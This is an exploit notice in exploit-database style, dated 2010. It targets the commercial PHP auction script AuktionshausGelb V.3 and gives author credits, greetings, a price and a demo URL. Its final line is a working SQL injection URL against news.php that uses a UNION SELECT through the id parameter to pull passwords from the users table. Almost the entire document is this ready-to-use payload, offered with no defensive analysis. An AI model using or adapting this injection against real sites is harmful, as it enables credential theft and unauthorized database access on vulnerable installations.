# Exploit Title: AuktionshausGelb V.3 SQL Injection news.php # Date: 17.02.2010 # Author: Easy Laster # Tested on: windows xp ######################################################################## ##AuktionshausGelb V.3 SQL Injection news.php ## ######################################################################## ######################################################################## ## _ _ _ _ ## ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ## ##| _| -_| .'| |___| | | _| -_| _| | -_| _| ## ##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ## ## ## ######################################################################## ########################################################################## #Script: Auktionshaus Gelb V.3 # #Vulnerabilities [ SQL Injection ] # #Language: [ PHP ] # #Download: [ buy this script ] # #Founder: [ ea$y laster ] # #Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] # #[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] # #Price: [ Commercial License EUR 249.90 € # #DEMO : http://xmedien.e-ee.de/auktion3/ # ############################################################################# #http://[demo].de/news.php?id=-1+union+select+1,2,password,4,5+from+users+--# #############################################################################